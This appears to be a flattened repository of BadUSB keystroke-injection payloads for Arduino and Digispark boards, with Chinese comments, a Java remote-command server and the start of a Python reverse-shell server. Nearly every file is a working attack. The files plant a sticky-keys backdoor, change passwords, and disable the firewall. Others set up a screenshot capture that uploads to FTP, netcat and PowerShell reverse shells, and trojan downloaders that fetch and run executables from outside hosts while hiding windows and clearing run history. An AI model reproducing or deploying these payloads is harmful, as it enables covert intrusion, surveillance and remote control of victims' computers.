Keyboard.press(KEY_LEFT_ALT); delay(3000); Keyboard.print('Y'); Keyboard.releaseAll(); delay(2000); //HIDE THE WINDOW Keyboard.println(); Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6&EXIT"); //尽量隐藏窗口 delay(800); Keyboard.press(KEY_LEFT_ALT); delay(200); Keyboard.print(" "); delay(200); Keyboard.release(KEY_LEFT_ALT); delay(200); Keyboard.print("m"); Keyboard.press(KEY_LEFT_ARROW); delay(3000); Keyboard.release(KEY_LEFT_ARROW); delay(500); Keyboard.println(); delay(500); Keyboard.println("REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&TAKEOWN /F %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE&ICACLS %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE /GRANT ADMINISTARTORS:f&ECHO Y|CACLS %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE /g %username%:f© C:\\WINDOWS\\SYSTEM32\\CMD.EXE C:\\WINDOWS\\SYSTEM32\\SETHC.EXE /y&EXIT"); //替换SETHC文件,设置shift后门 Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: SpecificFunctionCode/SimplyChangeAllUsersPasswords(TrickItem).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: SpecificFunctionCode/SimplyShutDownMachine(TrickItem).ino ================================================ #include void setup() { // put your setup code here, to run once: Keyboard.begin();//开始键盘通讯 delay(5000);//延时 
Keyboard.press(KEY_CAPS_LOCK);//开启大写锁 Keyboard.release(KEY_CAPS_LOCK); delay(50); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI);//按住win+R Keyboard.release('r'); Keyboard.print("cmd");//输入cmd Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 delay(500); Keyboard.print("shutdown -s -t 0");//关机 Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN);//回车 Keyboard.end(); } void loop() { } ================================================ FILE: SpecificFunctionCode/TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino ================================================ #define BOARDTYPE #ifdef TEENSY2 #include #endif void setup(){ delay(3000); wait_for_drivers(2000); minimise_windows(); delay(500); while(!cmd(3,500,"cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"")) { reset_windows_desktop(2000); } Keyboard.println("echo Add-Type -Assembly System.Windows.Forms > %temp%\\ss.ps1"); Keyboard.println("echo mkdir $env:temp\\screens -Force >> %temp%\\ss.ps1"); Keyboard.println("echo While (1) { >> %temp%\\ss.ps1"); Keyboard.println("echo $fn = $((get-date).toString('dd_MM_yyyy_HH_mm_ss')) + \".png\" >> %temp%\\ss.ps1"); Keyboard.println("echo $sb = [Windows.Forms.SystemInformation]::VirtualScreen >> %temp%\\ss.ps1"); Keyboard.println("echo $sso = New-Object Drawing.Bitmap $sb.Width, $sb.Height >> %temp%\\ss.ps1"); Keyboard.println("echo $dg = [Drawing.Graphics]::FromImage($sso) >> %temp%\\ss.ps1"); Keyboard.println("echo $dg.CopyFromScreen( $sb.Location, [Drawing.Point]::Empty, $sb.Size) >> %temp%\\ss.ps1"); Keyboard.println("echo $dg.Dispose() >> %temp%\\ss.ps1"); Keyboard.println("echo $sso.Save(\"$env:temp\\screens\\$fn\") >> %temp%\\ss.ps1"); Keyboard.println("echo $sso.Dispose() >> %temp%\\ss.ps1"); Keyboard.println("echo sleep INPUT0 >> %temp%\\ss.ps1"); Keyboard.println("echo } >> %temp%\\ss.ps1"); Keyboard.println("echo while(1) { > %temp%\\up.ps1"); 
Keyboard.println("echo $wc = New-Object System.Net.webclient >> %temp%\\up.ps1"); Keyboard.println("echo foreach($it in (ls $env:temp\\screens)) { >> %temp%\\up.ps1"); Keyboard.println("echo $wc.UploadFile(\"ftp://INPUT2:INPUT3@INPUT4/INPUT5\" + $it.Name, $it.FullName) } >> %temp%\\up.ps1"); Keyboard.println("echo rm (\"$env:temp\\screens\" + \"\\*\") -Force >> %temp%\\up.ps1"); Keyboard.println("echo sleep INPUT1 } >> %temp%\\up.ps1"); Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\ss.vbs"); Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\ss.ps1\"),0,true >> %temp%\\ss.vbs"); delay(1000); Keyboard.println("wscript %temp%\\ss.vbs"); Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\up.vbs"); Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\up.ps1\"),0,true >> %temp%\\up.vbs"); delay(1000); Keyboard.println("wscript %temp%\\up.vbs"); delay(3000); Keyboard.println("exit"); } void loop(){ } DEFS ================================================ FILE: TrojanDownloader/CERTUTIL_DownLoader/CERTUTIL_DownLoader_MSF.ino ================================================ #include void setup() { Keyboard.begin();//ʼͨ delay(4000);//ʱ1000룬Ҫ̫̣ΪÿԵٶȶһ Keyboard.press(KEY_CAPS_LOCK); //´д д Ȼ¾ͻ Keyboard.release(KEY_CAPS_LOCK); //ͷŴд delay(500); Keyboard.press(KEY_LEFT_GUI);//»ձ Ҳwin delay(500); Keyboard.press('r');//r delay(500); Keyboard.println("cmd.exe"); delay(1000); Keyboard.println("certutil -urlcache -split -f http://192.168.43.242/wwy.exe D:\\setup_11.5.0.exe"); delay(1000); delay(1000); Keyboard.println("D:\\SETUP_11.5.0.EXE"); delay(500); Keyboard.println("exit"); delay(500); Keyboard.press(KEY_CAPS_LOCK); //´д Keyboard.release(KEY_CAPS_LOCK); //ͷŴд ٴιرտĴд delay(400); Keyboard.end();//ͨѶ } void loop() { } ================================================ FILE: TrojanDownloader/FTP_DownLoader/FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino 
================================================ void setup() { Keyboard.begin(); delay(10000);//延时 Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================Run========================== Keyboard.println("CMD"); delay(1000); Keyboard.println("CD %userprofile%"); delay(100); Keyboard.println("NETSH FIREWALL SET OPMODE DISABLE"); //关闭FIREWALL防火墙 delay(2000); Keyboard.println("ECHO OPEN [ip] [PORT] > FTP.TXT"); //输入自己的IP及端口,等待对方连接 delay(100); Keyboard.println("ECHO [username] >> FTP.TXT"); //输入用户名 delay(100); Keyboard.println("ECHO [password] >> FTP.TXT"); //输入密码 delay(100); delay(100); Keyboard.println("ECHO BIN >> FTP.TXT"); delay(100); Keyboard.println("ECHO GET NC.EXE >> FTP.TXT"); //获取NC程序 delay(100); Keyboard.println("ECHO BYE >> FTP.TXT"); delay(100); Keyboard.println("FTP -S:FTP.TXT"); delay(100); Keyboard.println("DEL FTP.TXT & EXIT"); delay(2000); Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); delay(200); Keyboard.println("NC.EXE [listener ip] [listener port] -E CMD.EXE -D"); //后台直接监听,输入自己的IP及端口,一旦连接执行CMD命令 delay(2000); Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); delay(200); Keyboard.println('CMD'); delay(600); Keyboard.println('EXIT'); //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop() { } ================================================ FILE: TrojanDownloader/JAVA_DownLoader/JavaTrojanWrite(TargetEnvironmentRunJava).ino ================================================ void setup() { Keyboard.begin(); delay(10000);//延时 Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK); delay(200); //=========================Run========================== Keyboard.println("CMD"); delay(1000); Keyboard.println("ECHO import java.awt.*; >> client.java"); delay(100); Keyboard.println("ECHO import java.awt.event.*;>> client.java"); delay(100); Keyboard.println("ECHO import java.io.*;>> client.java"); delay(100); Keyboard.println("ECHO import java.net.*;>> client.java"); delay(100); Keyboard.println("ECHO public class Client extends Frame implements ActionListener { >> client.java"); delay(100); Keyboard.println("ECHO Label label = new Label(\"指令\"); >> client.java"); delay(100); Keyboard.println("ECHO Panel panel = new Panel(); >> client.java"); delay(100); Keyboard.println("ECHO TextField tf = new TextField(20); >> client.java"); delay(100); Keyboard.println("ECHO TextArea ta = new TextArea(); >> client.java"); delay(100); Keyboard.println("ECHO Socket client; >> client.java"); delay(100); Keyboard.println("ECHO InputStream in; >> client.java"); delay(100); Keyboard.println("ECHO OutputStream out; >> client.java"); delay(100); Keyboard.println("ECHO public Client() { >> client.java"); delay(100); Keyboard.println("ECHO super(\"客户机\"); >> client.java"); delay(100); Keyboard.println("ECHO setSize(250, 250); >> client.java"); delay(100); Keyboard.println("ECHO panel.add(label); >> client.java"); delay(100); Keyboard.println("ECHO panel.add(tf); >> client.java"); delay(100); Keyboard.println("ECHO tf.addActionListener(this); >> client.java"); delay(100); Keyboard.println("ECHO add(\"South\", panel); >> client.java"); delay(100); Keyboard.println("ECHO add(\"Center\", ta); >> client.java"); delay(100); Keyboard.println("ECHO addWindowListener(new WindowAdapter() { //退出 >> client.java"); delay(100); Keyboard.println("ECHO public void windowClosing(WindowEvent e) { >> client.java"); delay(100); Keyboard.println("ECHO System.exit(0); >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); 
Keyboard.println("ECHO }); >> client.java"); delay(100); Keyboard.println("ECHO show(); >> client.java"); delay(100); Keyboard.println("ECHO try { >> client.java"); delay(100); Keyboard.println("ECHO client = new Socket(InetAddress.getLocalHost(), 6000); //向6000端口发出客户请求 >> client.java"); delay(100); Keyboard.println("ECHO ta.append(\"服务器是:\" + client.getInetAddress().getHostAddress() + \"\n\n\"); >> client.java"); //需要手动替换监听主机IP、端口,这里只给出思路 delay(100); Keyboard.println("ECHO in = client.getInputStream(); >> client.java"); delay(100); Keyboard.println("ECHO out = client.getOutputStream(); >> client.java"); delay(100); Keyboard.println("ECHO } catch (IOException ioe) { >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO while (true) { >> client.java"); delay(100); Keyboard.println("ECHO try { >> client.java"); delay(100); Keyboard.println("ECHO byte[] buf = new byte[256]; >> client.java"); delay(100); Keyboard.println("ECHO in.read(buf); >> client.java"); delay(100); Keyboard.println("ECHO String str = new String(buf); >> client.java"); delay(100); Keyboard.println("ECHO ta.append(str + \"\n\"); >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO catch (IOException e) { >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO public void actionPerformed(ActionEvent e) { >> client.java"); delay(100); Keyboard.println("ECHO try { >> client.java"); delay(100); Keyboard.println("ECHO String str = tf.getText(); >> client.java"); delay(100); Keyboard.println("ECHO byte[] buf = str.getBytes(); >> client.java"); delay(100); Keyboard.println("ECHO tf.setText(null); >> client.java"); delay(100); Keyboard.println("ECHO out.write(buf); >> client.java"); delay(100); Keyboard.println("ECHO ta.append(\"\n指令:\" + 
str + \"\n\"); >> client.java"); delay(100); Keyboard.println("ECHO } catch (IOException ioe) { >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO public static void main(String[] args) { >> client.java"); delay(100); Keyboard.println("ECHO new Client(); >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("ECHO } >> client.java"); delay(100); Keyboard.println("javac client.java"); //编译java文件 delay(6000); Keyboard.println("java client"); //执行java文件 delay(300); Keyboard.press(KEY_LEFT_GUI); delay(200); Keyboard.print('r'); delay(200); Keyboard.release(KEY_LEFT_GUI); delay(200); Keyboard.println('CMD'); delay(600); Keyboard.println('EXIT'); //====================================================== Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop() { } ================================================ FILE: TrojanDownloader/JAVA_DownLoader/server.java ================================================ import java.io.*; import java.net.*; import java.awt.*; import java.awt.event.*; public class Server extends Frame { ServerSocket server; Socket client; InputStream in; OutputStream out; public Server() { super("服务器"); setSize(250,250); addWindowListener(new WindowAdapter(){ public void windowClosing(WindowEvent e) { System.exit(0); } }); show(); try{ server=new ServerSocket(6000); client=server.accept(); in=client.getInputStream(); out=client.getOutputStream(); }catch(IOException ioe){} while(true){ try{ String Result=null; byte[]buf=new byte[256]; in.read(buf); String str=new String(buf); Process p = Runtime.getRuntime().exec("cmd /c "+str); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((Result=br.readLine())!=null) { out.write(Result.getBytes()); } }catch (IOException e){} } } public static void main(String[]args) { new 
Server(); } } ================================================ FILE: TrojanDownloader/PSL_DownLoader/Downloa_PSL_Trojan-Execute_aSecondTime.ino ================================================ void setup() { Keyboard.begin(); delay(5000); Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.press('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("POWERSHELL -NOP -eXECUTIONpOLICY bYPASS -W HIDDEN -C \"(nEW-oBJECT nET.wEBcLIENT).dOWNLOADfILE('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1','C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1')\";C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/LinkServer_MSF_PSL_Download.ino ================================================ #include void setup() { //初始化,这里的代码只执行一次 delay(5000); //设置延时,让系统有足够的时间识别BadUsb5,防止后续代码执行错乱。 delay(1000);Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r');Keyboard.releaseAll();delay(500);//针对shift+ctrl切换输入法 Keyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_LEFT_CTRL);//针对win8及以上部分操作系统改换中文输入 Keyboard.press(KEY_LEFT_GUI);Keyboard.println(' ');//某些输入法的中英文切换 Keyboard.press(KEY_LEFT_SHIFT);//暴力直接切换成英文 Keyboard.press(KEY_CAPS_LOCK)//手动释放按键 Keyboard.releaseAll(); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键 Keyboard.set_key1(KEY_R); // 同时按下R键 Keyboard.send_now(); // 发送Win+R delay(100); Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的 Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); delay(300); Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录 Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.println("powershell (new- object 
System.Net.WebClient).DownloadFile('http://196.168.x.x/a.exe','D://b.exe')"); //下载木马并选择储存位置 Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(3000); //设置延迟,等待下载完成 Keyboard.println("D://1.exe"); //执行打开命令 Keyboard.set_key1(KEY_ENTER); delay(300); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_SPACE); Keyboard.set_key2(KEY_C); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.send_now(); //关闭cmd窗口 } void loop() //循环,这里的代码无限循环 { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/LinkServer_PSL_Download.ino ================================================ #include //Arduino Leonardo void setup() { //初始化 Keyboard.begin();//开始键盘通信 delay(1000);//延时1000毫秒, Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键 Keyboard.press('r');//按下r键 CMD delay(500); Keyboard.release(KEY_LEFT_GUI);//松掉win键 Keyboard.release('r');//松掉r键 delay(500); Keyboard.println("cmd"); Keyboard.press(KEY_RETURN); //按下回车键 Keyboard.release(KEY_RETURN); //释放回车键 delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //缩小窗口 Keyboard.println("powershell.exe -command start-process powershell -verb runAs"); /*开启管理员级别的powershell*/ delay(2000); Keyboard.press(KEY_LEFT_ARROW); //按住左方向键 Keyboard.release(KEY_LEFT_ARROW); //释放左方向键 delay(500); Keyboard.press(KEY_RETURN); //按下回车键 Keyboard.release(KEY_RETURN);//释放enter键 delay(3000); Keyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT"); //利用powershell 定义一个对象 Keyboard.println("$P.dOWNLOADfILE('HTTP://192.168.x.x/a.PS1','C:\\TEMP\\b.PS1')"); /*从服务端下载Powershell脚本*/ Keyboard.println("C:\\TEMP\\STEP1.PS1"); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //缩小窗口 delay(500); Keyboard.end();//结束键盘通讯 } void loop()//循环,这里的代码 { //循环体 } ================================================ FILE: 
TrojanDownloader/PSL_DownLoader/PSL_DownLoader0.ino ================================================ #include "DigiKeyboard.h" void setup() { DigiKeyboard.delay(5000); DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(3000); DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); DigiKeyboard.delay(1000); DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');")); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(750); DigiKeyboard.sendKeyStroke(KEY_ENTER); } void loop() { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader1.ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2"); delay(1000); Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'http://pan.plyz.net/d.asp?u=1948862583&p=x.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);"); delay(3000); Keyboard.println("C:\\X.EXE&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader2.ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); 
delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\x.exe ';$clnt.DownloadFile($url,$file);"); delay(3000); Keyboard.println("c:\\x.exe&exit"); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader3.ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(20000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C \"sTART-pROCESS -fILEpATH POWERSHELL.EXE \'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://127.0.0.1/1.JPG -oUTfILE C:\\1.JPG;C:\\1.JPG\' -vERB RUNAS\""); Keyboard.println(); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { Keyboard.press(KEY_LEFT_ALT); Keyboard.print('y'); Keyboard.release(KEY_LEFT_ALT); } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader4.ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD.EXE /t:01 /k MODE con:cols=16 lines=5"); delay(2000); Keyboard.println("ECHO sET XpOST = cREATEoBJECT(\"mICROSOFT.xmlhttp\") >WEBDOWN.VBS&ECHO XpOST.oPEN \"get\",\"HTTP://WWW.BAIDU.COM/MD5.EXE\",0 >>WEBDOWN.VBS&ECHO XpOST.sEND() >>WEBDOWN.VBS&ECHO sET SgET = cREATEoBJECT(\"adodb.sTREAM\") >>WEBDOWN.VBS&ECHO SgET.mODE = 3 >>WEBDOWN.VBS&ECHO SgET.tYPE = 1 >>WEBDOWN.VBS&ECHO SgET.oPEN() >>WEBDOWN.VBS&ECHO 
SgET.wRITE(XpOST.RESPONSEbODY) >>WEBDOWN.VBS&ECHO SgET.sAVEtOfILE \"x.EXE\",2 >>WEBDOWN.VBS&ECHO WSCRIPT.CREATEOBJECT(\"WSCRIPT.SHELL\").RUN \"X.EXE\" >>WEBDOWN.VBS&&WEBDOWN.VBS&&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_Downloader_Win&Linux_General.ino ================================================ void setup() { Keyboard.begin(); delay(3000); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_LEFT_ALT); Keyboard.print('t'); Keyboard.release(KEY_LEFT_CTRL); Keyboard.release(KEY_LEFT_ALT); delay(1000); Keyboard.println("rm x.out"); delay(1000); Keyboard.println("wget http://127.0.0.1/x.out -O x.out"); delay(1000); Keyboard.println("chmod +x x.out"); Keyboard.println("./x.out &"); delay(1000); Keyboard.println("exit"); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); delay(500); Keyboard.println("echo Set xPost = CreateObject(\"Microsoft.XMLHTTP\") >webdown.vbs&echo xPost.Open \"GET\",\"http://192.168.1.102/x.exe\",0 >>webdown.vbs&echo xPost.Send() >>webdown.vbs&echo Set sGet = CreateObject(\"ADODB.Stream\") >>webdown.vbs&echo sGet.Mode = 3 >>webdown.vbs&echo sGet.Type = 1 >>webdown.vbs&echo sGet.Open() >>webdown.vbs&echo sGet.Write(xPost.responseBody) >>webdown.vbs&echo sGet.SaveToFile \"x.exe\",2 >>webdown.vbs&cscript webdown.vbs&del webdown.vbs /Q /F&x.exe&exit"); Keyboard.end(); } void loop() { } ================================================ FILE: TrojanDownloader/PSL_DownLoader/PSL_Writes_Bounces.ino ================================================ void setup() { // put your setup code here, to run once: //reverse_shell via cmd(local) delay(5000); 
Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_ESC); Keyboard.releaseAll(); delay(500); Keyboard.print("cmd.exe"); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_LEFT_SHIFT); Keyboard.press(KEY_RETURN); Keyboard.releaseAll(); delay(2500); Keyboard.println("powershell"); delay(200); Keyboard.println("function cleanup {"); Keyboard.println("if ($client.Connected -eq $true) {$client.Close()}"); Keyboard.println("if ($process.ExitCode -ne $null) {$process.Close()}"); Keyboard.println("exit}"); // Setup 192.168.202.130 HERE Keyboard.println("$address = '192.168.1.103'"); // Setup PORT HERE Keyboard.println("$port = '8000'"); Keyboard.println("$client = New-Object system.net.sockets.tcpclient"); Keyboard.println("$client.connect($address,$port)"); Keyboard.println("$stream = $client.GetStream()"); Keyboard.println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize"); Keyboard.println("$process = New-Object System.Diagnostics.Process"); Keyboard.println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'"); Keyboard.println("$process.StartInfo.RedirectStandardInput = 1"); Keyboard.println("$process.StartInfo.RedirectStandardOutput = 1"); Keyboard.println("$process.StartInfo.UseShellExecute = 0"); Keyboard.println("$process.Start()"); Keyboard.println("$inputstream = $process.StandardInput"); Keyboard.println("$outputstream = $process.StandardOutput"); Keyboard.println("Start-Sleep 1"); Keyboard.println("$encoding = new-object System.Text.AsciiEncoding"); Keyboard.println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}"); Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.Length)"); Keyboard.println("$out = $null; $done = $false; $testing = 0;"); Keyboard.println("while (-not $done) {"); Keyboard.println("if ($client.Connected -ne $true) {cleanup}"); Keyboard.println("$pos = 0; $i = 1"); Keyboard.println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {"); 
Keyboard.println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)"); Keyboard.println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}"); Keyboard.println("if ($pos -gt 0) {"); Keyboard.println("$string = $encoding.GetString($networkbuffer,0,$pos)"); Keyboard.println("$inputstream.write($string)"); Keyboard.println("start-sleep 1"); Keyboard.println("if ($process.ExitCode -ne $null) {cleanup}"); Keyboard.println("else {"); Keyboard.println("$out = $encoding.GetString($outputstream.Read())"); Keyboard.println("while($outputstream.Peek() -ne -1){"); Keyboard.println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}"); Keyboard.println("$stream.Write($encoding.GetBytes($out),0,$out.length)"); Keyboard.println("$out = $null"); Keyboard.println("$string = $null}} else {cleanup}}"); Keyboard.println(""); //Enter to start execution } void loop() { // put your main code here, to run repeatedly: } ================================================ FILE: TrojanDownloader/PY_DownLoader/PyShellServer.py ================================================ #!/usr/bin/env python # -*- coding:utf-8 -*- ''' PyShell PyShell主要用于建立TCP连接,反弹Shell,远程执行命令 其中Server端为攻击机(远程发送命令),Client端为被控端(接收命令并执行) ''' import socket import base64 import sys import binascii import os import re import threading import time from StringIO import StringIO class servers: """ Server of PyShell PyShell服务端代码类 """ def __init__(self,server_address): self.server_address=server_address self.main() def connec(self): """ 配置监听参数,包括ip地址,port号,最大链接数量等。 """ try: self.server=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #TCP套接字 self.server.bind(self.server_address) #ip:port self.server.listen(10) #设置最大连接数 print "[*]Listening on %s:%d" % (self.server_address[0],self.server_address[1]) except: print u'参数填写有误,或者该端口已被占用!' 
